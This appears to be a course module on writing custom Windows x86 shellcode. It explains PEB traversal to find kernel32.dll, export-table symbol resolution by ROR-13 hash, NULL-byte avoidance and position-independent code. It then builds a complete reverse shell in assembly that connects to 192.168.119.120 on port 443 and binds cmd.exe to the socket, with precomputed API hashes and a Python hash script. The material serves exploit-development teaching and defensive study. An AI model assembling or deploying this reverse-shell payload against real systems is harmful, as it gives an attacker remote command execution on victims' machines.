- Introduction
- Calling Conventions on x86
- The System Call Problem
- Finding kernel32.dll
- Resolving Symbols
- NULL-Free Position-Independent Shellcode (PIC)
- Reverse Shell Implementation
- Conclusion
In previous modules, various payloads were generated using the Metasploit Framework for exploits. This module focuses on understanding how shellcode works internally and developing custom reverse shells from scratch.
Shellcode is a set of CPU instructions designed to be executed after a vulnerability is successfully exploited. Originally, the term referred to exploit code used to spawn a root shell, but modern shellcode can perform much more complex operations including reverse shells, bind shells, and arbitrary code execution.
Key characteristics of shellcode:
- Written in assembly language and translated to hexadecimal opcodes
- Can directly manipulate CPU registers and call system functions
- Must be universal and reliable across different Windows versions
- Requires low-level operating system knowledge
Writing effective shellcode for Windows platforms is challenging due to the complexity of the operating system architecture and the need for portability across different versions.
Calling conventions define the schema used to invoke function calls and are critical for shellcode developers. They specify:
- How arguments are passed to functions
- Which registers the callee must preserve for the caller
- How the stack frame is prepared before the call
- How the stack frame is restored after the call
__stdcall Convention:
- Used by Win32 API functions
- Parameters pushed to stack in reverse order
- Stack cleaned up by the callee
__cdecl Convention:
- Used by C runtime functions
- Parameters pushed to stack in reverse order
- Stack cleaned up by the caller
On 32-bit systems, register handling follows specific rules:
Volatile Registers (can be clobbered):
- EAX, EDX, ECX
Non-volatile Registers (must be preserved):
- All other registers must be preserved by the callee
Note: "Clobbered" refers to overwriting a CPU register's value during a function call without restoring it to the original value before returning.
graph TD
A[Function Call] --> B{Calling Convention}
B -->|__stdcall| C[Win32 API Functions]
B -->|__cdecl| D[C Runtime Functions]
C --> E[Callee cleans stack]
D --> F[Caller cleans stack]
E --> G[Parameters in reverse order]
F --> G
System calls (syscalls) provide an interface between user space and the protected kernel, allowing access to low-level operating system functions for:
- Input/Output operations
- Thread synchronization
- Socket management
- Memory management
The Windows Native API is equivalent to the system call interface on UNIX systems. Key characteristics:
- Mostly undocumented interface exposed by ntdll.dll
- Hidden behind higher-level APIs due to NT architecture
- Supports multiple operating system APIs (Win32, OS/2, POSIX, DOS/Win16)
- System call numbers change between Windows versions (unlike Linux)
Windows limitations for shellcode development:
- Limited feature set in system call interface
- No socket API via direct system calls
- Need to use Windows API through Dynamic Link Libraries (DLLs)
- Must avoid hard-coded function addresses for portability
flowchart LR
A[Shellcode Needs] --> B[Avoid Direct Syscalls]
B --> C[Use Windows API via DLLs]
C --> D[Load/Locate DLLs in Memory]
D --> E[Resolve Function Addresses]
E --> F[Execute Required Functions]
Essential functions for this process:
- LoadLibraryA: Load DLLs into memory
- GetModuleHandleA: Get base address of loaded DLL
- GetProcAddress: Resolve function symbols
- kernel32.dll: Contains all necessary APIs (almost always loaded)
kernel32.dll is the foundation for shellcode development because:
- Contains LoadLibrary and GetProcAddress APIs
- Required to load additional DLLs and resolve functions
- Almost guaranteed to be loaded in process memory
- Exports core APIs required for most processes
The most reliable technique for determining kernel32.dll base address involves parsing the Process Environment Block (PEB).
The PEB is allocated by the operating system for every running process and can be found by traversing process memory starting at the FS register address.
graph TD
A[FS Register] --> B[Thread Environment Block - TEB]
B --> C[PEB Pointer at offset 0x30]
C --> D[PEB Structure]
D --> E[_PEB_LDR_DATA at offset 0x0C]
E --> F[Three Linked Lists]
F --> G[InLoadOrderModuleList]
F --> H[InMemoryOrderModuleList]
F --> I[InInitializationOrderModuleList]
_PEB_LDR_DATA Structure:
+0x00c InLoadOrderModuleList
+0x014 InMemoryOrderModuleList
+0x01c InInitializationOrderModuleList
_LDR_DATA_TABLE_ENTRY Structure:
+0x000 InLoadOrderLinks
+0x008 InMemoryOrderLinks
+0x010 InInitializationOrderLinks
+0x018 DllBase (Base Address)
+0x01c EntryPoint
+0x020 SizeOfImage
+0x024 FullDllName (UNICODE_STRING)
+0x02c BaseDllName (UNICODE_STRING)
The shellcode traverses the InInitializationOrderModuleList to find kernel32.dll:
- Access PEB through FS:[0x30]
- Navigate to _PEB_LDR_DATA structure
- Iterate through InInitializationOrderModuleList
- Compare module names to find "kernel32.dll"
- Extract base address from DllBase field
The shellcode uses the Keystone Framework for assembly and CTypes for Windows API integration:
Python Setup Code:
import ctypes, struct
from keystone import *
# Initialize Keystone engine in 32-bit mode
ks = Ks(KS_ARCH_X86, KS_MODE_32)
# Compile assembly instructions
encoding, count = ks.asm(CODE)
shellcode = bytearray(encoding)Core Assembly Implementation:
start:
int3 ; Breakpoint for debugging
mov ebp, esp ; Set up stack frame
sub esp, 60h ; Allocate stack space
find_kernel32:
xor ecx, ecx ; ECX = 0
mov esi, fs:[ecx+30h] ; ESI = &(PEB)
mov esi, [esi+0Ch] ; ESI = PEB->Ldr
mov esi, [esi+1Ch] ; ESI = PEB->Ldr.InInitOrder
next_module:
mov ebx, [esi+8h] ; EBX = InInitOrder[X].base_address
mov edi, [esi+20h] ; EDI = InInitOrder[X].module_name
mov esi, [esi] ; ESI = InInitOrder[X].flink (next)
cmp [edi+12*2], cx ; Check if modulename[12] == 0x00
jne next_module ; No: try next moduleThis technique leverages the fact that kernel32.dll is typically the first module initialized, making it reliably discoverable through the InInitializationOrderModuleList.
Once kernel32.dll base address is obtained, the next step is resolving exported function addresses. This is accomplished by traversing the Export Address Table (EAT) instead of relying on GetProcAddress.
typedef struct _IMAGE_EXPORT_DIRECTORY {
DWORD Characteristics;
DWORD TimeDateStamp;
WORD MajorVersion;
WORD MinorVersion;
DWORD Name;
DWORD Base;
DWORD NumberOfFunctions;
DWORD NumberOfNames;
DWORD AddressOfFunctions; // RVA of function addresses array
DWORD AddressOfNames; // RVA of function names array
DWORD AddressOfNameOrdinals; // RVA of ordinals array
} IMAGE_EXPORT_DIRECTORY;graph LR
A[AddressOfNames Array] --> B[Function Names]
C[AddressOfNameOrdinals Array] --> D[Ordinal Values]
E[AddressOfFunctions Array] --> F[Function RVAs]
B --> G[Index i]
G --> D
D --> H[New Index j]
H --> F
F --> I[Function VMA = RVA + DLL Base]
The symbol resolution process follows these steps:
-
Locate Export Directory Table:
mov eax, [ebx+3Ch] ; Offset to PE Signature mov edi, [ebx+eax+78h] ; Export Table Directory RVA add edi, ebx ; Export Table Directory VMA
-
Access Arrays:
mov ecx, [edi+18h] ; NumberOfNames mov eax, [edi+20h] ; AddressOfNames RVA add eax, ebx ; AddressOfNames VMA mov [ebp-4], eax ; Save AddressOfNames VMA
-
Iterate Through Names:
find_function_loop: jecxz find_function_finished ; Jump if ECX is 0 dec ecx ; Decrement counter mov eax, [ebp-4] ; Restore AddressOfNames VMA mov esi, [eax+ecx*4] ; Get RVA of symbol name add esi, ebx ; Set ESI to VMA of symbol name
To optimize shellcode size and enable reusable symbol resolution, a hashing algorithm converts function names to 4-byte hashes.
compute_hash:
xor eax, eax ; NULL EAX
cdq ; NULL EDX
cld ; Clear direction flag
compute_hash_again:
lodsb ; Load next byte from ESI into AL
test al, al ; Check for NULL terminator
jz compute_hash_finished ; Jump if NULL terminator found
ror edx, 0Dh ; Rotate EDX 13 bits right
add edx, eax ; Add byte to accumulator
jmp compute_hash_again ; Next iteration
compute_hash_finished:
; EDX now contains unique 4-byte hash#!/usr/bin/python
import numpy, sys
def ror_str(byte, count):
binb = numpy.base_repr(byte, 2).zfill(32)
while count > 0:
binb = binb[-1] + binb[0:-1]
count -= 1
return (int(binb, 2))
def compute_hash(function_name):
edx = 0x00
ror_count = 0
for eax in function_name:
edx = edx + ord(eax)
if ror_count < len(function_name)-1:
edx = ror_str(edx, 0xd)
ror_count += 1
return hex(edx)
# Example usage:
# python ComputeHash.py TerminateProcess
# Output: 0x78b5b983Once the correct hash is found, retrieve the function's Virtual Memory Address:
find_function_compare:
cmp edx, [esp+24h] ; Compare computed hash with target
jnz find_function_loop ; If no match, try next function
; Hash matches - get function address
mov edx, [edi+24h] ; AddressOfNameOrdinals RVA
add edx, ebx ; AddressOfNameOrdinals VMA
mov cx, [edx+2*ecx] ; Get function's ordinal
mov edx, [edi+1Ch] ; AddressOfFunctions RVA
add edx, ebx ; AddressOfFunctions VMA
mov eax, [edx+4*ecx] ; Get function RVA
add eax, ebx ; Get function VMA
mov [esp+1Ch], eax ; Store in stack for returnSymbol Resolution Flow:
sequenceDiagram
participant SC as Shellcode
participant EDT as Export Directory Table
participant AN as AddressOfNames
participant ANO as AddressOfNameOrdinals
participant AF as AddressOfFunctions
SC->>EDT: Access Export Directory
EDT->>AN: Get AddressOfNames array
SC->>AN: Iterate through function names
AN->>SC: Return function name
SC->>SC: Compute hash of name
SC->>SC: Compare with target hash
alt Hash matches
SC->>ANO: Get ordinal using same index
ANO->>SC: Return ordinal value
SC->>AF: Use ordinal as index
AF->>SC: Return function RVA
SC->>SC: Add DLL base to get VMA
else Hash doesn't match
SC->>AN: Try next function name
end
NULL bytes (0x00) are problematic in shellcode because they often terminate string operations in vulnerable applications. Several techniques eliminate NULL bytes:
Instead of:
sub esp, 200h ; Contains NULL bytesUse:
add esp, 0xFFFFFDF0 ; Achieves same result without NULL bytesReplace instructions that generate NULL bytes:
; Avoid CALL instructions with positive offsets
; Use alternative instruction sequencesPosition-independent code (PIC) can execute correctly regardless of its memory location. This is achieved by:
find_function_shorten:
jmp find_function_shorten_bnc ; Short jump
find_function_ret:
pop esi ; Get return address
mov [ebp+04h], esi ; Save for later use
jmp resolve_symbols_kernel32
find_function_shorten_bnc:
call find_function_ret ; Call with negative offsetPIC Implementation Flow:
graph TD
A[Shellcode Entry] --> B[Short Jump Forward]
B --> C[Call Backward]
C --> D[Push Return Address]
D --> E[Pop Address into Register]
E --> F[Calculate Relative Offsets]
F --> G[Execute Position-Independent Code]
This technique exploits the fact that:
- CALL instruction pushes return address onto stack
- POP retrieves this address for relative calculations
- Negative offsets typically avoid NULL bytes
To create a reverse shell, the shellcode must load the Winsock library and resolve networking functions.
From kernel32.dll:
- CreateProcessA (hash: 0x16b3fe72)
- LoadLibraryA (hash: 0xec0e4e8e)
- TerminateProcess (hash: 0x78b5b983)
From ws2_32.dll:
- WSAStartup (hash: 0x3bfcedcb)
- WSASocketA (hash: 0xadf509d9)
- WSAConnect (hash: 0x60aaf9ec)
load_ws2_32:
xor eax, eax ; NULL EAX
mov ax, 6C6Ch ; Move end of string "ll"
push eax ; Push with NULL terminator
push 642E3233h ; Push "32.d"
push 5F327377h ; Push "ws2_"
push esp ; Push pointer to string
call dword ptr [ebp+14h] ; Call LoadLibraryA
resolve_symbols_ws2_32:
mov ebx, eax ; Move ws2_32.dll base to EBX
; Now resolve individual functions using find_functionWSAStartup initializes the Winsock DLL for use by the shellcode.
int WSAStartup(
WORD wVersionRequired, // Version 2.2 (0x0202)
LPWSADATA lpWSAData // Pointer to WSADATA structure
);The structure requires approximately 398 bytes (0x18E) of stack space:
call_wsastartup:
mov eax, esp ; Current stack pointer
mov cx, 590h ; Structure size
sub eax, ecx ; Avoid overwriting
push eax ; Push lpWSAData pointer
xor eax, eax ; NULL EAX
mov ax, 202h ; Version 2.2
push eax ; Push wVersionRequired
call dword ptr [ebp+1Ch] ; Call WSAStartupCreates a socket for network communication.
SOCKET WSASocketA(
int af, // Address family (AF_INET = 2)
int type, // Socket type (SOCK_STREAM = 1)
int protocol, // Protocol (IPPROTO_TCP = 6)
LPWSAPROTOCOL_INFOA lpProtocolInfo, // NULL
GROUP g, // NULL
DWORD dwFlags // NULL
);call_wsasocketa:
xor eax, eax ; NULL EAX
push eax ; Push dwFlags (NULL)
push eax ; Push g (NULL)
push eax ; Push lpProtocolInfo (NULL)
mov al, 06h ; IPPROTO_TCP
push eax ; Push protocol
sub al, 05h ; AL = 1 (SOCK_STREAM)
push eax ; Push type
inc eax ; EAX = 2 (AF_INET)
push eax ; Push af
call dword ptr [ebp+20h] ; Call WSASocketAEstablishes connection to the target system.
typedef struct sockaddr_in {
short sin_family; // AF_INET (2)
USHORT sin_port; // Port number (443 = 0x01BB)
IN_ADDR sin_addr; // IP address (192.168.119.120)
CHAR sin_zero[8]; // Reserved (NULL)
} SOCKADDR_IN;call_wsaconnect:
mov esi, eax ; Save socket descriptor
xor eax, eax ; NULL EAX
push eax ; Push sin_zero[4-7]
push eax ; Push sin_zero[0-3]
push 7877a8c0h ; Push sin_addr (192.168.119.120 reversed)
mov ax, 0bb01h ; Port 443 in network byte order
shl eax, 10h ; Shift to upper 16 bits
add ax, 02h ; Add AF_INET
push eax ; Push sin_port & sin_family
; Get pointer to structure
push esp ; Push pointer to sockaddr_in
pop edi ; Store in EDI
; Set up remaining parameters
xor eax, eax ; NULL EAX
push eax ; Push lpGQOS (NULL)
push eax ; Push lpSQOS (NULL)
push eax ; Push lpCalleeData (NULL)
push eax ; Push lpCallerData (NULL)
add al, 10h ; namelen = 16
push eax ; Push namelen
push edi ; Push *name (sockaddr_in)
push esi ; Push socket descriptor
call dword ptr [ebp+24h] ; Call WSAConnectCreates the cmd.exe process with redirected I/O handles.
BOOL CreateProcessA(
LPCSTR lpApplicationName, // NULL
LPSTR lpCommandLine, // "cmd.exe"
LPSECURITY_ATTRIBUTES lpProcessAttributes, // NULL
LPSECURITY_ATTRIBUTES lpThreadAttributes, // NULL
BOOL bInheritHandles, // TRUE
DWORD dwCreationFlags, // NULL
LPVOID lpEnvironment, // NULL
LPCSTR lpCurrentDirectory, // NULL
LPSTARTUPINFOA lpStartupInfo, // Configured structure
LPPROCESS_INFORMATION lpProcessInformation // Output structure
);The STARTUPINFOA structure (68 bytes) must be configured to redirect standard I/O:
create_startupinfoa:
push esi ; hStdError (socket)
push esi ; hStdOutput (socket)
push esi ; hStdInput (socket)
xor eax, eax ; NULL EAX
push eax ; lpReserved2 (NULL)
push eax ; cbReserved2 & wShowWindow (NULL)
mov al, 80h ; STARTF_USESTDHANDLES flag
xor ecx, ecx ; NULL ECX
mov cx, 80h ; 0x80
add eax, ecx ; EAX = 0x100
push eax ; dwFlags (STARTF_USESTDHANDLES)
; Push remaining NULL fields
xor eax, eax
push eax ; dwFillAttribute
push eax ; dwYCountChars
push eax ; dwXCountChars
push eax ; dwYSize
push eax ; dwXSize
push eax ; dwY
push eax ; dwX
push eax ; lpTitle
push eax ; lpDesktop
push eax ; lpReserved
mov al, 44h ; Structure size (68 bytes)
push eax ; cb
push esp ; Get pointer to structure
pop edi ; Store in EDIcreate_cmd_string:
mov eax, 0ff9a879bh ; Negative value to avoid NULL
neg eax ; EAX = 00657865 ("exe\0")
push eax ; Push "exe\0"
push 2E646D63h ; Push "cmd."
push esp ; Get pointer to "cmd.exe"
pop ebx ; Store in EBXcall_createprocessa:
mov eax, esp ; Current stack pointer
xor ecx, ecx ; NULL ECX
mov cx, 390h ; Reserve space for PROCESS_INFORMATION
sub eax, ecx ; Calculate lpProcessInformation
push eax ; Push lpProcessInformation
push edi ; Push lpStartupInfo
; Push NULL parameters
xor eax, eax ; NULL EAX
push eax ; lpCurrentDirectory
push eax ; lpEnvironment
push eax ; dwCreationFlags
inc eax ; EAX = 1 (TRUE)
push eax ; bInheritHandles
dec eax ; EAX = 0 (NULL)
push eax ; lpThreadAttributes
push eax ; lpProcessAttributes
push ebx ; lpCommandLine ("cmd.exe")
push eax ; lpApplicationName (NULL)
call dword ptr [ebp+18h] ; Call CreateProcessAgraph TD
A[Shellcode Entry Point] --> B[Find kernel32.dll via PEB]
B --> C[Resolve kernel32 symbols]
C --> D[Load ws2_32.dll]
D --> E[Resolve ws2_32 symbols]
E --> F[Call WSAStartup]
F --> G[Call WSASocketA]
G --> H[Call WSAConnect]
H --> I[Create STARTUPINFOA]
I --> J[Call CreateProcessA]
J --> K[Reverse Shell Active]
subgraph "Symbol Resolution Process"
L[Hash Function Name] --> M[Search Export Table]
M --> N[Compare Hashes]
N -->|Match| O[Get Function Address]
N -->|No Match| P[Try Next Function]
P --> M
end
- Always preserve non-volatile registers
- Use stack space efficiently to avoid overwrites
- Calculate proper offsets for structure storage
- Check return values for API success
- Handle edge cases in symbol resolution
- Ensure graceful shellcode termination
- Reuse assembly instruction sequences
- Minimize shellcode size through efficient coding
- Use negative offsets to avoid NULL bytes
- Avoid hardcoded addresses for portability
- Handle ASLR (Address Space Layout Randomization)
- Ensure compatibility across Windows versions
This module demonstrated the complete process of creating custom Windows shellcode from scratch. Key learning outcomes include:
- Understanding Windows Architecture: How DLLs, APIs, and system calls interact
- Dynamic Symbol Resolution: Avoiding hardcoded addresses through PEB traversal and EAT parsing
- Position-Independent Code: Creating shellcode that works regardless of memory location
- NULL-Byte Avoidance: Techniques to eliminate problematic bytes from shellcode
- Practical Implementation: Building a functional reverse shell using Windows networking APIs
The techniques covered provide a foundation for developing reliable, portable shellcode for Windows environments. While this implementation prioritizes clarity and understanding over size optimization, the same principles apply to creating more compact shellcode variants.
Advanced Topics for Further Study:
- Shellcode encoders and decoders
- Anti-debugging and evasion techniques
- 64-bit shellcode development
- Advanced payload staging techniques